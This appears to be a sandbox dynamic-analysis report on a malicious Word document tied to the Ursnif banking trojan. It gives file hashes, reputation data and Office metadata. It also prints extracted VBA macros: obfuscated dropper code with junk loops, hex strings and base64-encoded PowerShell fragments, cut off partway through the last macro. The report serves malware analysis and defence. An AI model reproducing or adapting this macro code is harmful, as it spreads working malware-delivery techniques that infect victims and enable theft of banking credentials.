303ad8c1...029a | Files
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Keylogger, Spyware, Downloader, Trojan, Banking Trojan

Remarks (1/1)

(0x200000e): The overall sleep time of all monitored processes was truncated from "12 seconds" to "10 seconds" to reveal dormant functionality.

Remarks

(0x200000c): The maximum memory dump size was exceeded. Some dumps may be missing in the report.

Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\AvGcpVlPprpjYv.bin Downloaded File Binary
Malicious
»
Parent File analysis.pcap
Mime Type application/vnd.microsoft.portable-executable
File Size 749.00 KB
MD5 5016784605ad3fd883fbdfdd5fbd469f Copy to Clipboard
SHA1 30100663d3d88d7399948f7f92602efcb70b5a86 Copy to Clipboard
SHA256 14d4db1adde49001f81cb670a60f9d40fc7dea4b96cd77029ca87b44ccb586c8 Copy to Clipboard
SSDeep 12288:INVtF21kgh6j10JGCDn3NVEoYFA5rId7ipJC:INVtEjcMfTpYC5cmHC Copy to Clipboard
File Reputation Information
»
Severity
Blacklisted
First Seen 2019-11-13 16:20 (UTC+1)
Last Seen 2019-11-14 03:37 (UTC+1)
Names Win32.Trojan.Ursnif
Families Ursnif
Classification Trojan
Local AV Matches (1)
»
Threat Name Severity
Trojan.GenericKD.32710286
Malicious
83f4ea26254d69825486bffd1d400217aac7245c5c48fe5acc3ccdea173c4851 Embedded File Image
Whitelisted
»
Parent File C:\Users\aETAdzjz\Desktop\xuzyww.doc
Mime Type image/x-tga
File Size 642 bytes
MD5 4f03b86e4d6631c26ff5fffc7332be1d Copy to Clipboard
SHA1 14952a78ea51df67d5b5b6c6b4de3d96ba7935bd Copy to Clipboard
SHA256 83f4ea26254d69825486bffd1d400217aac7245c5c48fe5acc3ccdea173c4851 Copy to Clipboard
SSDeep 12:M1JQ1lXsD+UOMqlR6giVPYsXXJ4lZWqnT/umKCR8J7md8JsCR4PmdX6ljgnJt:uIlI+aZrXXJ4ySTWER+lDR4Pqrj Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2011-07-22 22:22 (UTC+2)
Last Seen 2019-09-06 11:17 (UTC+2)
C:\Users\aETAdzjz\Desktop\xuzyww.doc Sample File Word Document
Unknown
»
Mime Type application/msword
File Size 266.00 KB
MD5 35f864c78809db8ac3dc8e646c57df26 Copy to Clipboard
SHA1 127042472e86dbe86cd8ed429a6c975c438be542 Copy to Clipboard
SHA256 303ad8c115d9a5706637638802b3d2df8a28bbab8b255e761605f0f997a0029a Copy to Clipboard
SSDeep 3072:CEPWExY0+WWO0B+DiMBR3iYyTruDjAOMZo5h8pnXS2:BxY0+LJUDiWS1/zZZoqi Copy to Clipboard
Office Information
»
Revision 1
Create Time 2019-11-13 21:48:00+00:00
Modify Time 2019-11-13 21:48:00+00:00
Document Information
»
Codepage Latin-1
Application Microsoft Office Word
App Version 15.0
Template Normal.dotm
Document Security SecurityFlag.NONE
Page Count 1
Line Count 3
Paragraph Count 1
Word Count 70
Character Count 405
Chars With Spaces 474
Heading Pairs Title
scale_crop False
shared_doc False
Controls (1)
»
CLSID Control Name Associated Vulnerability
{00020906-0000-0000-C000-000000000046} Word97 -
VBA Macros (11)
»
Macro #1: BRsoCskBdUv9Lbl
»
Attribute VB_Name = "BRsoCskBdUv9Lbl"
Sub YRrcMqucb(CdtCsQEEHYIltggzjvv As String)
Dim acDDKeyXPrPAZjlPJHRKuO As Integer
acDDKeyXPrPAZjlPJHRKuO = 24675
On Error Resume Next
Dim SHFtyPrNxCYzIHEDGxbpKo As String, KAyuzCTxTqBwuSOQ As Integer, DmXQJlDS As String
Dim IGWFewBYyX As Integer
Dim XMCylXhrASP As String
SHFtyPrNxCYzIHEDGxbpKo = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
DmXQJlDS = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
IGWFewBYyX = 0
For KAyuzCTxTqBwuSOQ = 56 To 1 Step -1
IGWFewBYyX = 2 * IGWFewBYyX + Sgn(InStr(1, DmXQJlDS, Mid(InID, KAyuzCTxTqBwuSOQ, 1), vbBinaryCompare))
If KAyuzCTxTqBwuSOQ Mod 4 = 1 Then
XMCylXhrASP = Mid(SHFtyPrNxCYzIHEDGxbpKo, IGWFewBYyX + 1, 1) + XMCylXhrASP
IGWFewBYyX = 0
End If
Next KAyuzCTxTqBwuSOQ
On Error Resume Next
Dim LqePl As String, AxUjPMiYFuaU As Integer, tBigwBG As String
Dim ThghVTXHSPayZDjmkmvEgdaL As Integer
Dim NxkncLYJXl As String
LqePl = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
tBigwBG = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
ThghVTXHSPayZDjmkmvEgdaL = 0
For AxUjPMiYFuaU = 82 To 1 Step -1
ThghVTXHSPayZDjmkmvEgdaL = 2 * ThghVTXHSPayZDjmkmvEgdaL + Sgn(InStr(1, tBigwBG, Mid(InID, AxUjPMiYFuaU, 1), vbBinaryCompare))
If AxUjPMiYFuaU Mod 4 = 1 Then
NxkncLYJXl = Mid(LqePl, ThghVTXHSPayZDjmkmvEgdaL + 1, 1) + NxkncLYJXl
ThghVTXHSPayZDjmkmvEgdaL = 0
End If
Next AxUjPMiYFuaU
haTgSHdgnFqBRZgZZOGwCOcQ
Dim qTTAULsKZOZzXkitA As String
qTTAULsKZOZzXkitA = "47785173776c6a724c77686e616c4a676675734a475362594" & "b586a44594e746c46414253776e745741794f5955436b"
Dim RTGfKWLpKMnveCDpUehJ As Boolean
RTGfKWLpKMnveCDpUehJ = IsNull(qTTAULsKZOZzXkitA)
End Sub
Sub zsZUhgLPJWELDqzSleRRxPNBP(rMGMDwBbQjoCc)
Dim SECRHGaL As Long
Dim jqgJadzG As Variant
jqgJadzG = Array("N", "Z", "G", "A", "E", "G", "k", "E", "Z", "W", "Z", "K", "y", "e", "M", "J", "N", "u", "W", "r", "N", "T", "R", "o", "Z", "Y", "S")
Dim RqkRzQGtajWrZzl As String
RqkRzQGtajWrZzl = "52685a5a596445" & "7676524161774b" & "46554a6b645761" & "4e6a544644536c" & "53667852496663" & "714b4e6571676d" & "7a"
YRrcMqucb ("SwjFyrLrOBYZCLpScq")
For SECRHGaL = LBound(jqgJadzG) To UBound(jqgJadzG)
Debug.Print jqgJadzG(SECRHGaL)
Next SECRHGaL
Dim mndbKxwY As Boolean
mndbKxwY = True
Dim CZHQQJNIVX As Integer
CZHQQJNIVX = 614
End Sub
Function YXMssGSZxljUXefo(LPVSvUygMbiOmEK As String)
Dim xOuVmBmjZXvhxQvYEAlOu As Integer
xOuVmBmjZXvhxQvYEAlOu = 22926
LPVSvUygMbiOmEK = "awBwAHcAbwB4AD0AIgBtAHUAdgBiAHgAeABqAGIAIgA7AAoAfQBjAGEAdABjAGgAewAKACQAaQBrAGoAeQBlAGwAcgB2AGYAawBxAGQAbQA9ACIAawBlAHYAYgBqAGUAYwBhACIAOwAKAH0ACgAkAG8AcwB4AHEAZgB0AGUAZgBrAHoAPQAiAGcAawBwAHcAcQBtAHAAIgA7AAoAfQB9AGQAdwBuAGwAZAA7AAoAJABjAGMAZgB6AGEAagB6AGsAYQBiAGIAaQB3AGIAdQA9ACIAZQByAGgAdgBrACIAOwAKAA=="
Dim AHDKjpFvxxvyRRjVdISVPcIid As String
AHDKjpFvxxvyRRjVdISVPcIid = "6a554c725277496b78414d747352636644454743635359476d50464" & "65742437241"
Dim ERLnCASxBfKSGPKCwIFv As Integer
ERLnCASxBfKSGPKCwIFv = 24538
Dim HjdQNVMTmdAQLG As String
HjdQNVMTmdAQLG = "656248647868465166477a" & "52467967635758506c474e" & "416e524e47"
YXMssGSZxljUXefo = LPVSvUygMbiOmEK
On Error Resume Next
Dim AIXZyvciUUT As String, SLrAUXHcdw As Integer, jpWQBzPdo As String
Dim nVasAWyJVttAyrNjepS As Integer
Dim MHZCUPKhwQepi As String
AIXZyvciUUT = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
jpWQBzPdo = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
nVasAWyJVttAyrNjepS = 0
For SLrAUXHcdw = 94 To 1 Step -1
nVasAWyJVttAyrNjepS = 2 * nVasAWyJVttAyrNjepS + Sgn(InStr(1, jpWQBzPdo, Mid(InID, SLrAUXHcdw, 1), vbBinaryCompare))
If SLrAUXHcdw Mod 5 = 1 Then
MHZCUPKhwQepi = Mid(AIXZyvciUUT, nVasAWyJVttAyrNjepS + 1, 1) + MHZCUPKhwQepi
nVasAWyJVttAyrNjepS = 0
End If
Next SLrAUXHcdw
End Function
Macro #2: FUoFDWpFdafurd2Rx
»
Attribute VB_Name = "FUoFDWpFdafurd2Rx"
Sub TfVhkBTZVHfnFIcmjyOLWosde(twHkNDsTAjCMlhSlMiuQZL)
Dim gbQtOA
Dim QXUnMYbszpwojUTLcNXy As Integer
QXUnMYbszpwojUTLcNXy = 7869
Dim LoQopVitFJvFJGClymjUJix As Integer
LoQopVitFJvFJGClymjUJix = 25126
Dim bLNbiU As Integer
bLNbiU = 7436
gbQtOA = 0
Dim XgjTeeYm
Dim YKRXY As Long
YKRXY = 817401658
Dim EKzwHjFbWDOtym As Long
EKzwHjFbWDOtym = 166767120
HWdnjJsLejknxiliEu
XgjTeeYm = Timer
Do While Timer - XgjTeeYm < gbQtOA
Loop
End Sub
Sub HMOrJyuZtbZWWrOkq(zSGVKx)
Dim lByruai As Double
Dim XdMyIoW As Double
lByruai = 1963
Dim HTaZQYBTSqhl As String
HTaZQYBTSqhl = "68446c56516d715146566e626674775464556f666a627748796c654e" & "42526e72527a6c59485471506b"
Dim JYaSNLJqTaFLuELnmAoz As Long
JYaSNLJqTaFLuELnmAoz = 277866187
Dim ozhrbQx As Integer
ozhrbQx = 13515
XdMyIoW = lByruai / Application.InchesToPoints(1)
Debug.Print XdMyIoW
TfVhkBTZVHfnFIcmjyOLWosde ("rHIdbhoLtjWZGLSXtQGvnGQMLPsTPPwiR")
End Sub
Sub MQhbL(oIbCvDbgz As String)
Dim lxWnFWqVnublQRxDJlq As Boolean
lxWnFWqVnublQRxDJlq = True
Dim YNjDdcpWYsF As Integer
YNjDdcpWYsF = 6460
Dim xhqeuaFL As Long
xhqeuaFL = 777440903
On Error Resume Next
Dim YuKvMUFfb As String, fNSbKDsWS As Integer, JFRTCeAwuKyZVbk As String
Dim mlLqosurNmPoewJLz As Integer
Dim KkCKqE As String
YuKvMUFfb = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
JFRTCeAwuKyZVbk = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
mlLqosurNmPoewJLz = 0
For fNSbKDsWS = 2 To 1 Step -1
mlLqosurNmPoewJLz = 2 * mlLqosurNmPoewJLz + Sgn(InStr(1, JFRTCeAwuKyZVbk, Mid(InID, fNSbKDsWS, 1), vbBinaryCompare))
If fNSbKDsWS Mod 1 = 1 Then
KkCKqE = Mid(YuKvMUFfb, mlLqosurNmPoewJLz + 1, 1) + KkCKqE
mlLqosurNmPoewJLz = 0
End If
Next fNSbKDsWS
On Error Resume Next
Dim WLCehiYHtBuEiROQ As String, BoSRCMOZwckEZSbUzK As Integer, HyXhzwgMxhtvKPROp As String
Dim jBTqCfzHDfswzYItUCFaLaa As Integer
Dim AoJvzkIgyWxoaPJSWtmT As String
WLCehiYHtBuEiROQ = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
HyXhzwgMxhtvKPROp = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
jBTqCfzHDfswzYItUCFaLaa = 0
For BoSRCMOZwckEZSbUzK = 32 To 1 Step -1
jBTqCfzHDfswzYItUCFaLaa = 2 * jBTqCfzHDfswzYItUCFaLaa + Sgn(InStr(1, HyXhzwgMxhtvKPROp, Mid(InID, BoSRCMOZwckEZSbUzK, 1), vbBinaryCompare))
If BoSRCMOZwckEZSbUzK Mod 2 = 1 Then
AoJvzkIgyWxoaPJSWtmT = Mid(WLCehiYHtBuEiROQ, jBTqCfzHDfswzYItUCFaLaa + 1, 1) + AoJvzkIgyWxoaPJSWtmT
jBTqCfzHDfswzYItUCFaLaa = 0
End If
Next BoSRCMOZwckEZSbUzK
HMOrJyuZtbZWWrOkq ("ZvCsFh")
Dim mHNgyQRjEnu As Integer
mHNgyQRjEnu = 13978
Dim yYWZpqEJJjNlXzAvHG As String
yYWZpqEJJjNlXzAvHG = "4c6d6c4d544a7" & "76c4567746e63" & "4a534a7156784" & "7457870656f61" & "625878496d697" & "94f"
End Sub
Sub NIlzwiXMVJyuQ(eAGfGTOAyTSn)
Dim NgMnBA As Long
Dim SgNVdHtK As Variant
SgNVdHtK = Array("L", "l", "o", "Y", "O", "L", "b", "n", "Z", "n", "c", "s", "s", "z", "u", "k", "h", "t", "Z", "p", "o", "F", "C", "G", "p", "u", "S")
Dim SBhhFAmMyF As String
SBhhFAmMyF = "5a6b7562587262486a686e665a4563684b4461754" & "f4e"
Dim VGQWLdrbi As String
VGQWLdrbi = "4f564" & "35047" & "55705" & "6485a" & "684d"
Dim CADWnAliZpMSWG As String
CADWnAliZpMSWG = "64617275534d4a6e4e72764b65736364" & "6a4a7268594d73"
MQhbL ("URKnXnUeihppqJwGUUWdTZILGgveH")
For NgMnBA = LBound(SgNVdHtK) To UBound(SgNVdHtK)
Debug.Print SgNVdHtK(NgMnBA)
Next NgMnBA
Dim xZrRnOdVcbHNENq As Long
xZrRnOdVcbHNENq = 909895648
Dim eVvEiMdsyDA As Long
eVvEiMdsyDA = 62934119
End Sub
Function twONvgASqiFAkYgLIZ(RwJHKgyDoNZNMiDsYqQs As String)
Dim KuxWKgFRNfNhJcNIWA As Boolean
KuxWKgFRNfNhJcNIWA = IsNull("")
Dim IPIQNjEpC
Dim wpOdsugjyEUfZfG
IPIQNjEpC = "BURVUwIjmCroBLDt"
Dim LumgrmEjHoCo
LumgrmEjHoCo = "NCYOgwwUuVVIaeurPGbIjtNNQNbZzXklrnqDJnJGxXXdLfMuxlUXrPcKpKvVxqqtFBHIIdwvscIFikYswiKCkQUPdBbSoYXuOWqKAChzTdTmVIgzHNAaSGmEKxbpLMNUFTLBOyTFlBDhymzxrAKKQSjZNentKcbDTUEjcAPcsdPmhwxbHfwOYcaHtyuGwCS"
wpOdsugjyEUfZfG = "NHCglOroTcaPgCzjKRWSlszzzoYZjiDHdQFlFUSQlIn"
If Len(wpOdsugjyEUfZfG) = 0 Then
IPIQNjEpC = IPIQNjEpC + "XGCGyZIOnbSwvXXZjBdJXTDinDxsstbCVgvUHFjYoUcBDqRCSIIEgWSvNDHBqyDxetiCyYFuoJPpoJrrSvXHbmDAYzAHeGxNENoSGrFEuMPazDfrwkenAvJtEFJvhzxwCclxuvKmoVxcvPNzHOfgXEBjvpcioXrvLnQidboRyqrSbuaAHkobCxqwH"
Else
Do Until Len(LumgrmEjHoCo) = 0
LumgrmEjHoCo = Left(LumgrmEjHoCo, Len(LumgrmEjHoCo) - 1)
Loop
End If
On Error Resume Next
Dim THGOFlcD As String, ggKLVnjoVyiSlbhQ As Integer, prtsB As String
Dim uDYVbaekjYXgJiKodWtrJ As Integer
Dim nJtPKzJDxjmGCtlMe As String
THGOFlcD = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
prtsB = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
uDYVbaekjYXgJiKodWtrJ = 0
For ggKLVnjoVyiSlbhQ = 96 To 1 Step -1
uDYVbaekjYXgJiKodWtrJ = 2 * uDYVbaekjYXgJiKodWtrJ + Sgn(InStr(1, prtsB, Mid(InID, ggKLVnjoVyiSlbhQ, 1), vbBinaryCompare))
If ggKLVnjoVyiSlbhQ Mod 1 = 1 Then
nJtPKzJDxjmGCtlMe = Mid(THGOFlcD, uDYVbaekjYXgJiKodWtrJ + 1, 1) + nJtPKzJDxjmGCtlMe
uDYVbaekjYXgJiKodWtrJ = 0
End If
Next ggKLVnjoVyiSlbhQ
NIlzwiXMVJyuQ ("zaHRCrgRxHCEORuKLji")
Dim wpxgHRfSkcjQbLaVGwzvSdAHd As Boolean
wpxgHRfSkcjQbLaVGwzvSdAHd = True
End Function
Function hUMQKNWacwJDjots(yQdhTJDFQfQ As String)
Dim NBPgzPwiwvSD As String
NBPgzPwiwvSD = "6b544d6e546b4c6676766a636155516d" & "5156547942754f526356737166745670"
yQdhTJDFQfQ = "HYAegB0AHcAbgB4AG8APQAiAGUAYgB1AG0AZAAiADsACgAkAHMAcABhAHoAeABlAGkAcABwAGwAaABiAGsAeAA9ACIAegBxAHQAYQByAGIAeQBkACIAOwAKACQAbgBrAHMAZgBsAHcAPQAiAG0AcAB6AG8AbwBkAGQAeQB5AGQAbwB5AHcAIgA7AAoAJABxAHoAawBmAHMAPQAiAGEAZgBwAG4AcgB3AHUAZABkAG4AbwBpAHIAcwBoAGIAawAiADsACgAkAGsAZABwAHkAZwBlAHAAbQBmAGkAcQBuAGsAdgBlAD0AIgBpAGUAagBhAGcAZwBwAHoAdQBmAGoAcAB0AHUAeABwAHoAIgA7AAoAJAB5AGoAcQB4AHYAcgBiAGIAbgBzAGsAZQB2AGcAcgA9ACIAZA"
Dim DwxdNDRnLEQxR As Boolean
DwxdNDRnLEQxR = IsNull("")
hUMQKNWacwJDjots = yQdhTJDFQfQ
Dim xTSmJKC
Dim sAHNLVckflQJ
xTSmJKC = "eoLVbkDoIwncTlGZntwTTe"
Dim XjeDCxEmvCqWdr
XjeDCxEmvCqWdr = "zPDsfPxLLjcTIxJpCAKjIPpVZAWrhdhPVFYEdrNUSkIPWHmOHPAfFQcNEluikchdjcvOXsiKTRkEXypJDUlRoltJVaSFXgzFchMjFtQMXEWfkAMNhJMoEylegPOAUvuiXRJDrhUjJzfpWplhRokachRHCzHQMGOCQRTvbdKNYeQtOanadfYVPoakfigpewvHqoC"
sAHNLVckflQJ = "iqVGrmJUWjesRrJLhvEeOZzuHFgukvTetpAhYiuAAdaHecmqbAeCzVcfYEleyJxSllHwFpzonyekcwZMtSyNWsCpgPZzpvGWOEWWionzeanbjebUYWQyGzJvGqLYgyqDBtfcWSCtedAHQLXnSqsjckepLUdsDaRqlLJblWrirrQdfbirzrtSNFshBUhSALrKPpAZWuUSZldMepsPSDfahafYtNdbeMixVDULjjuasYKmcgPnjJqwKHJRVrbArSmnvAiyROvCjISEoHCWfVlNrWcnrTQpfgGvkZYRtVNWnMoVmbwdtMspaPQSzeHweglztlfcWrrIgscKsbQ"
If Len(sAHNLVckflQJ) = 0 Then
xTSmJKC = xTSmJKC + "qBBFkBguGDeNCpUFZQiU"
Else
Do Until Len(XjeDCxEmvCqWdr) = 0
XjeDCxEmvCqWdr = Left(XjeDCxEmvCqWdr, Len(XjeDCxEmvCqWdr) - 1)
Loop
End If
End Function
Macro #3: IVfvppQkMRgZLEiD8ywz
»
Attribute VB_Name = "IVfvppQkMRgZLEiD8ywz"
Sub mRdLuQ(WuEcXBDxzEjajPmnrKvPSoE)
Dim enjnFEWvr As Double
Dim DLSVEbkT As Double
enjnFEWvr = 1227
Dim dcytc As Integer
dcytc = 24509
Dim ARIjuzcL As Integer
ARIjuzcL = 3582
DLSVEbkT = enjnFEWvr / Application.InchesToPoints(1)
Debug.Print DLSVEbkT
sUqKEjOqkZnVTv
End Sub
Function IadvyZmCVphTxPJEzykUO(qHkKKWToufPaAR As String)
Dim XYbqdNlmbwmBKfN As String
XYbqdNlmbwmBKfN = "6c4e4e6343657842636e7645707244507069595063466e55" & "54576169444955"
Dim DTqiriUpFumwP As Boolean
DTqiriUpFumwP = True
Dim iYzuIQeRxWtZsq As Long
iYzuIQeRxWtZsq = 45359220
On Error Resume Next
Dim wivPYsOWyeiDcvYGFIaYXKcX As String, zfosLM As Integer, lciLGRSVnXhdu As String
Dim cBpoARXhoNCMr As Integer
Dim zLVoaWhw As String
wivPYsOWyeiDcvYGFIaYXKcX = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
lciLGRSVnXhdu = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
cBpoARXhoNCMr = 0
For zfosLM = 56 To 1 Step -1
cBpoARXhoNCMr = 2 * cBpoARXhoNCMr + Sgn(InStr(1, lciLGRSVnXhdu, Mid(InID, zfosLM, 1), vbBinaryCompare))
If zfosLM Mod 5 = 1 Then
zLVoaWhw = Mid(wivPYsOWyeiDcvYGFIaYXKcX, cBpoARXhoNCMr + 1, 1) + zLVoaWhw
cBpoARXhoNCMr = 0
End If
Next zfosLM
Dim aYZhtdVjcmYNiZfdZMOeMF
Dim SGYFcIVrghG
aYZhtdVjcmYNiZfdZMOeMF = "rmyJvqeEyuhAmp"
Dim NHnEQvxHrAdrnqy
NHnEQvxHrAdrnqy = "rquvuqtIOgvoExrKmOMAesOsgFfiNZRzlSyHLQEhEKdEdnxaDWmPxDrjWwpFzhTDiQKWtuPveVBuJwOlkBPBHMwOOlmPfAOHygCWscpyAAodzBrbLySFXcUxnMCWykSfmiGeWhrNtuHykfltyzXEOgDAldkaLHbanNjnEWXJCxdehEkjvgfVrBGRbeCGSIBkQxEPDYOwNVtbpQYrstUEwHJCfmkWxAomsRmUzippcHPyiJzSopcncxpmLNHfJLmIYIfLlTKSegBMwFufSARaGSGXHRsIUCsPLofplsJUNddLcGKrCKZsrmfIMUtHPCdUI"
SGYFcIVrghG = "eugIHSvcIFkMIZDhllPyemylbIOPClCfWVhXlrzkmzJsORdniyNdaVEdAUVZoSfeEpZpigqkEoRgqqwweiksSRJClWsGuFoPeyroJWnplILUoOVwPhGDxljMXdkolhXTxjymPYdzMHRjbNB"
If Len(SGYFcIVrghG) = 0 Then
aYZhtdVjcmYNiZfdZMOeMF = aYZhtdVjcmYNiZfdZMOeMF + "aujtzGJpNZVOHDgQqSeocsxVxlNSuOPXKqCddVLtrIaxKBTbvSQEFERInujzTvhYIthfQxHrcSbPtIXCJZSGTNWmxgWUMMCdcFTTAJNuTLhOlUrn"
Else
Do Until Len(NHnEQvxHrAdrnqy) = 0
NHnEQvxHrAdrnqy = Left(NHnEQvxHrAdrnqy, Len(NHnEQvxHrAdrnqy) - 1)
Loop
End If
mRdLuQ ("wotQrDaEJhJqcUPFFNRUFEdiZPNdfl")
Dim xLrXxwCvspIVAmPg As String
xLrXxwCvspIVAmPg = "646c77526a50614d466349435851686f56696c415a665969585152487a4b6b5376" & "58"
Dim uUnlpAdMqlnQFrwny As Long
uUnlpAdMqlnQFrwny = 259891937
End Function
Sub cqmJQZzzlhOGqVusDCCQi(OFgAmNWeVIVzrrAGZrgJXynAF)
Dim xNQPIN As Double
Dim jTcKclOs As Double
xNQPIN = 998
Dim hAUfBSAca As Boolean
hAUfBSAca = IsNull("")
jTcKclOs = xNQPIN / Application.InchesToPoints(1)
Debug.Print jTcKclOs
IadvyZmCVphTxPJEzykUO ("eByAHJkjHegGskDubNwlPmFIoTtMejR")
End Sub
Sub HmuDrJctVCuSHcuCBxJu(cTclLNwAmyqoaHjTG As String)
Dim ATuGGYoJBUOZ As Integer
ATuGGYoJBUOZ = 13333
On Error Resume Next
Dim BcnjhvxpeucBEuqcEZHxARujn As String, ckcGxDfn As Integer, AVlaHsYqaWweYTzPGDOjjGDAl As String
Dim pTxDgyeVrzflEfjRtgelyJ As Integer
Dim LvPfcLwOb As String
BcnjhvxpeucBEuqcEZHxARujn = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
AVlaHsYqaWweYTzPGDOjjGDAl = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
pTxDgyeVrzflEfjRtgelyJ = 0
For ckcGxDfn = 97 To 1 Step -1
pTxDgyeVrzflEfjRtgelyJ = 2 * pTxDgyeVrzflEfjRtgelyJ + Sgn(InStr(1, AVlaHsYqaWweYTzPGDOjjGDAl, Mid(InID, ckcGxDfn, 1), vbBinaryCompare))
If ckcGxDfn Mod 2 = 1 Then
LvPfcLwOb = Mid(BcnjhvxpeucBEuqcEZHxARujn, pTxDgyeVrzflEfjRtgelyJ + 1, 1) + LvPfcLwOb
pTxDgyeVrzflEfjRtgelyJ = 0
End If
Next ckcGxDfn
On Error Resume Next
Dim gNRVIjEVOm As String, cPbRFbuyMHKfAMLLasa As Integer, MDOghHSzvCaqASWtuHSOUY As String
Dim jETYHnauEOWxCrGkg As Integer
Dim kpvcNJdFGUH As String
gNRVIjEVOm = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
MDOghHSzvCaqASWtuHSOUY = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
jETYHnauEOWxCrGkg = 0
For cPbRFbuyMHKfAMLLasa = 88 To 1 Step -1
jETYHnauEOWxCrGkg = 2 * jETYHnauEOWxCrGkg + Sgn(InStr(1, MDOghHSzvCaqASWtuHSOUY, Mid(InID, cPbRFbuyMHKfAMLLasa, 1), vbBinaryCompare))
If cPbRFbuyMHKfAMLLasa Mod 5 = 1 Then
kpvcNJdFGUH = Mid(gNRVIjEVOm, jETYHnauEOWxCrGkg + 1, 1) + kpvcNJdFGUH
jETYHnauEOWxCrGkg = 0
End If
Next cPbRFbuyMHKfAMLLasa
cqmJQZzzlhOGqVusDCCQi ("VlnSsOBNxjqJcRYdxY")
Dim EZxUrbb As Long
EZxUrbb = 141630526
Dim lxtMwwZYNcOBDfb As Integer
lxtMwwZYNcOBDfb = 10291
Dim nnyBjFguU As Integer
nnyBjFguU = 24653
End Sub
Sub vBQvMwTeR(CBVwlSxIePGjgkwEQiG)
Dim xSRdEK As Double
Dim zwuJKtHBS As Double
xSRdEK = 1915
Dim rEjhOBxtZElGlgPHZ As String
rEjhOBxtZElGlgPHZ = "624c5869734c6" & "26a526a617a4d" & "7657426d57594" & "84f6866715076" & "4164"
Dim lcKPVqZIpNiqd As Integer
lcKPVqZIpNiqd = 14814
zwuJKtHBS = xSRdEK / Application.InchesToPoints(1)
Debug.Print zwuJKtHBS
HmuDrJctVCuSHcuCBxJu ("PRlOprMdeowEOyxXuz")
End Sub
Function gJFokRdWCGw(jEbSjVqbUcXXUaA As String)
Dim YSajTqimIdhwacEv As Long
YSajTqimIdhwacEv = 78765314
jEbSjVqbUcXXUaA = "vAG0AIgAgAC0AVwBhAGkAdAAgAC0ATgBvAE4AZQB3AFcAaQBuAGQAbwB3ACAALQBQAGEAcwBzAFQAaAByAHUAOwAKACQAdQB3AHEAeAB0AGsAagBoAHQAcwBzAGYAeQB0AD0AIgB1AGsAbgBxAGgAYwBmAHcAegBoAHoAegBkACIAOwAKAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcgBnAGQAbwBtADsACgAkAHgAZwBjAG4AbQBsAHgAPQAiAGoAZwBsAGsAcQBkAGMAbwB1ACIAOwAKAGUAeABpAHQAOwAKACQAYwBuAGoAbwBtAD0AIgBrAHcAdQB2AGsAaAB4AG0AdwBiACIAOwAKAH0ACgAkAHMAbgBlAGgAagB5AGcAZABqAGoA"
Dim qnLetHzjPGAdNJrsGKmmHRgJ As Long
qnLetHzjPGAdNJrsGKmmHRgJ = 876879481
gJFokRdWCGw = jEbSjVqbUcXXUaA
Dim DHMvuosMcAffufyMsLVG
Dim JZXEjxJDoueipAdTQyrfuN
DHMvuosMcAffufyMsLVG = "qMsqghOnyrIXL"
Dim RAsLbDIeNbCWLFHMDfnbZQ
RAsLbDIeNbCWLFHMDfnbZQ = "NZQbTNzRMRYIMbQDwRwSGtcZQnKZILqPrkIPEhBTsDuOIaKWIAZGxwselePXbRvrITuLOGFHdLOjPbUWqYRJBlhHOGVHHAjPgLVYZdNRSYjKsjHgIBYHUmAtINJffXTBMVVpIRphHBJODwFpeHVErAiFUZBftCJWIoDwbxGfffwqYBCXbpCigkjHDSydpQxJIqSVFEPEstFNeCjqchltwq"
JZXEjxJDoueipAdTQyrfuN = "NWNiQYoruBPwROHFJAOHemqWzLhNXajdUySvbRtsQMIUnEeiQuVuTDrYdNfKPDorlYPqYTwyOSymlXdRQwbonsadUfLDnkxtGoFVgCMtDzRRfAESfYhPRqizznaSHCBrRpHhUloropXeaqEmAIduSQCBDYZisWEPjcjjpyrAEsSADxZWFQFxfLkcivvnleBebneeAvJFzrDyiCViKaHjrGlCCSIpwCwxOdsGcxOmzFnCXfYhpWuVlEuKqADBCfbVUPudfBIJobzhAPUlNmXbhBjovfopArtYZaPtpNqKuTovFYzjOAFnomogcxsTHBSViaMeDLlSgFZJNNpCfqhShwnzSWnlFkXlbECxweciwktsdqVVaicXeITdefftMRbfLIIpQgTRqKToQMsudQmhyv"
If Len(JZXEjxJDoueipAdTQyrfuN) = 0 Then
DHMvuosMcAffufyMsLVG = DHMvuosMcAffufyMsLVG + "aqGozlBknsoCKBWoPXZCajIwxuhpiobTOgaKUigtIRUWyDiLunQSKRqmpMCHHCPfwAnUKGQuxxALljnnOuDRdrIZhPeVhBTBUreNFqFSHnUocOuewVWibXhGnpmkrcFfkrvxixpRunfEWYDw"
Else
Do Until Len(RAsLbDIeNbCWLFHMDfnbZQ) = 0
RAsLbDIeNbCWLFHMDfnbZQ = Left(RAsLbDIeNbCWLFHMDfnbZQ, Len(RAsLbDIeNbCWLFHMDfnbZQ) - 1)
Loop
End If
End Function
Macro #4: ThisDocument
»
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "xfNoxvsWhBBL, 0, 0, INKEDLib, InkEdit"
Sub uAXcHctGNlILAIPBND(PjdXGZwqCoOtqwqOVXGzr)
Dim vwpShXm As Double
Dim ShBZmnfqTSlbOrpiFjhyn As Boolean
